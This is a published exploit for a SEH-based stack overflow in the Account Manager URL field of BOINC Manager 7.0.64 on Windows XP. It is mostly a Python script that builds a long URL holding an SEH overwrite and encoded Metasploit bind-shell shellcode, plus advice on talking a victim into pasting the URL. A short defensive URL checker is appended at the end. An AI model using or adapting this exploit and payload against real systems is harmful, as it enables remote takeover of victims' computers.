
# Title : BOINC Manager (Seti@home) 7.0.64 Field SEH based BOF
# Published : 2013-06-02


# Exploit Title: BOINC Manager 7.0.64 Field stack based buffer overflow
# Date: 26.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://boinc.berkeley.edu/  
# Software Link: http://boinc.berkeley.edu/dl/boinc_7.0.64_windows_intelx86.exe
# Version: 7.0.64 for Windows
# Tested on: Windows XP SP3 Eng (32bits)
#
#
#BOINC 7.0.64 Windows x86 (used by Seti@HOME) Manager Field stack based buffer overflow - SEH based
#
#BOINC is a program that lets you donate your idle computer time to science projects like
#SETI@home, Climateprediction.net, Rosetta@home, World Community Grid, and many others. 
#
#In order to exploit the vulnerability the attacker must convince the victim to use a very long URL as the Account Manager URL.
#This URL is written by the exploit to the exploit.txt file. If it doesn't work the first time, give it one more try.
#The victim must follow:
#
#Add project -> Use account manager -> Account Manager URL
#
#As with all field BOFs the severity is rather low, but hey, watch the movie and read below:
#
#http://www.youtube.com/watch?v=H9Hz8OPWjtM&feature=youtu.be
#
#The developer team at berkeley.edu was informed about the issue and released BOINC 7.1.3, including the fix, within a week.




#windows/shell/bind_tcp EXITFUNC=thread LPORT=31337 R | msfencode -e x86/alpha_upper -t c
# Byte strings are used throughout so the file is written byte-for-byte on both Python 2 and 3
# (in text mode on Python 3, bytes above 0x7F would be UTF-8 encoded and shift every offset).
shellcode = (
b"\x89\xe6\xdb\xdf\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
b"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
b"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
b"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
b"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x49\x35\x50"
b"\x33\x30\x35\x50\x55\x30\x4c\x49\x4a\x45\x56\x51\x4e\x32\x35"
b"\x34\x4c\x4b\x51\x42\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
b"\x56\x32\x32\x34\x4c\x4b\x43\x42\x56\x48\x54\x4f\x4f\x47\x50"
b"\x4a\x57\x56\x36\x51\x4b\x4f\x36\x51\x39\x50\x4e\x4c\x47\x4c"
b"\x33\x51\x33\x4c\x53\x32\x46\x4c\x47\x50\x39\x51\x38\x4f\x44"
b"\x4d\x45\x51\x4f\x37\x4d\x32\x4c\x30\x46\x32\x31\x47\x4c\x4b"
b"\x46\x32\x42\x30\x4c\x4b\x30\x42\x47\x4c\x55\x51\x58\x50\x4c"
b"\x4b\x31\x50\x34\x38\x4d\x55\x39\x50\x33\x44\x51\x5a\x55\x51"
b"\x4e\x30\x50\x50\x4c\x4b\x30\x48\x52\x38\x4c\x4b\x56\x38\x51"
b"\x30\x35\x51\x49\x43\x4d\x33\x47\x4c\x37\x39\x4c\x4b\x56\x54"
b"\x4c\x4b\x55\x51\x4e\x36\x46\x51\x4b\x4f\x30\x31\x39\x50\x4e"
b"\x4c\x49\x51\x38\x4f\x44\x4d\x45\x51\x48\x47\x56\x58\x4d\x30"
b"\x44\x35\x5a\x54\x55\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x46"
b"\x44\x43\x45\x4d\x32\x46\x38\x4c\x4b\x56\x38\x56\x44\x43\x31"
b"\x4e\x33\x35\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x30\x58\x45"
b"\x4c\x35\x51\x58\x53\x4c\x4b\x53\x34\x4c\x4b\x35\x51\x38\x50"
b"\x4b\x39\x51\x54\x56\x44\x37\x54\x51\x4b\x51\x4b\x33\x51\x56"
b"\x39\x31\x4a\x50\x51\x4b\x4f\x4d\x30\x46\x38\x51\x4f\x30\x5a"
b"\x4c\x4b\x42\x32\x5a\x4b\x4d\x56\x31\x4d\x45\x38\x47\x43\x57"
b"\x42\x45\x50\x33\x30\x45\x38\x54\x37\x54\x33\x46\x52\x31\x4f"
b"\x31\x44\x52\x48\x30\x4c\x32\x57\x57\x56\x53\x37\x4b\x4f\x4e"
b"\x35\x4f\x48\x5a\x30\x35\x51\x35\x50\x53\x30\x47\x59\x38\x44"
b"\x30\x54\x36\x30\x53\x58\x51\x39\x4b\x30\x32\x4b\x43\x30\x4b"
b"\x4f\x39\x45\x36\x30\x36\x30\x36\x30\x50\x50\x51\x50\x46\x30"
b"\x47\x30\x56\x30\x42\x48\x4b\x5a\x54\x4f\x59\x4f\x4b\x50\x4b"
b"\x4f\x59\x45\x4a\x37\x36\x51\x49\x4b\x51\x43\x53\x58\x43\x32"
b"\x33\x30\x33\x4a\x55\x39\x4d\x59\x4a\x46\x52\x4a\x42\x30\x36"
b"\x36\x30\x57\x42\x48\x38\x42\x59\x4b\x50\x37\x53\x57\x4b\x4f"
b"\x39\x45\x30\x53\x50\x57\x55\x38\x4e\x57\x4a\x49\x47\x48\x4b"
b"\x4f\x4b\x4f\x59\x45\x46\x33\x56\x33\x50\x57\x52\x48\x43\x44"
b"\x5a\x4c\x47\x4b\x4d\x31\x4b\x4f\x38\x55\x30\x57\x4d\x47\x42"
b"\x48\x42\x55\x42\x4e\x30\x4d\x35\x31\x4b\x4f\x39\x45\x32\x4a"
b"\x53\x30\x43\x5a\x34\x44\x36\x36\x56\x37\x42\x48\x35\x52\x58"
b"\x59\x49\x58\x51\x4f\x4b\x4f\x39\x45\x4c\x4b\x36\x56\x32\x4a"
b"\x57\x30\x52\x48\x33\x30\x32\x30\x43\x30\x55\x50\x56\x36\x42"
b"\x4a\x55\x50\x43\x58\x50\x58\x39\x34\x56\x33\x4d\x35\x4b\x4f"
b"\x39\x45\x4a\x33\x56\x33\x43\x5a\x35\x50\x46\x36\x46\x33\x50"
b"\x57\x42\x48\x43\x32\x49\x49\x58\x48\x31\x4f\x4b\x4f\x58\x55"
b"\x45\x51\x58\x43\x51\x39\x4f\x36\x4c\x45\x5a\x56\x42\x55\x5a"
b"\x4c\x58\x43\x41\x41")


# 46-byte prefix that makes the string look like a project URL
urlstart = b"http://boinc.unex.es/extremadurathome?longurl="
#Pre and Post - play with them to make them look like a valid long URL (some nice examples from google apps are out there)
pre = b"C"*(1292-46)          # padding: the SEH record starts 1292 bytes into the URL
nseh = b"\xEB\x06\x43\x43"    # short jmp +6 over the rest of this record and the handler address
#XP sp 3 32bit Eng 0x018f1d3a : popad # call ebp |  {PAGE_READWRITE} space outside of loaded modules to bypass safeseh
NOP = b"\x43\x43"
seh = b"\x3a\x1d\x8f\x01"     # 0x018f1d3a, little-endian
post = b"C"*5000


buffer = urlstart + pre + nseh + seh + NOP + shellcode + post

print(buffer)

# binary mode so the raw bytes reach the file unchanged
with open('exploit.txt', 'wb') as f:
    f.write(buffer)
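A defender-side counterpart to the script above, added here as an example (it is not part of the original exploit and not BOINC code): a small checker for Account Manager URLs that flags the two traits a field overflow like this one depends on, a length far beyond any real URL and raw non-URL bytes embedded in the string. The limit `MAX_URL_LEN`, the names `inspect_account_manager_url` and `is_safe`, and the sample URLs are assumptions and constructed values, not anything from BOINC.

```python
# Added example (not from the original exploit or from BOINC): an input-side
# check for Account Manager URLs. A URL built to overflow a fixed-size field
# is far longer than any real URL and carries raw bytes (jump stubs,
# addresses, encoded payload) that no legitimate URL contains.
import string
from urllib.parse import urlsplit

# Assumed policy limit; real account-manager URLs are a few dozen bytes long.
MAX_URL_LEN = 1024
# Characters a URL may contain (RFC 3986 unreserved and reserved sets plus '%').
URL_CHARS = frozenset(string.ascii_letters + string.digits + "-._~:/?#[]@!$&'()*+,;=%")


def inspect_account_manager_url(url: bytes) -> dict:
    """Report on a raw URL exactly as it would be read from the input field."""
    if not isinstance(url, bytes):
        raise TypeError("expected raw bytes")
    non_printable = sum(1 for b in url if b < 0x20 or b >= 0x7F)
    disallowed = sum(1 for b in url if chr(b) not in URL_CHARS)
    # Decode leniently only to pull out the scheme; all counting stays on bytes.
    try:
        scheme = urlsplit(url.decode("ascii", errors="replace")).scheme.lower()
    except ValueError:
        scheme = ""
    return {
        "length": len(url),
        "too_long": len(url) > MAX_URL_LEN,
        "non_printable_bytes": non_printable,
        "disallowed_bytes": disallowed,
        "scheme_ok": scheme in ("http", "https"),
    }


def is_safe(url: bytes) -> bool:
    """Accept only http(s) URLs of sane length made solely of URL characters."""
    report = inspect_account_manager_url(url)
    return report["scheme_ok"] and not report["too_long"] and report["disallowed_bytes"] == 0


# Constructed samples: a normal-looking URL and an over-long one that ends in
# 16 high bytes after the padding (the shape of the payload above, not its content).
BENIGN_URL = b"https://account-manager.example/"
OVERLONG_URL = b"http://example.invalid/?longurl=" + b"C" * 1300 + bytes(range(0x80, 0x90))

if __name__ == "__main__":
    for sample in (BENIGN_URL, OVERLONG_URL):
        print(is_safe(sample), inspect_account_manager_url(sample))
```

The check works on bytes rather than a decoded string on purpose: decoding first would either fail or silently replace the very bytes that matter, so length and character counting are done before any decoding and the scheme is extracted from a lossy copy only.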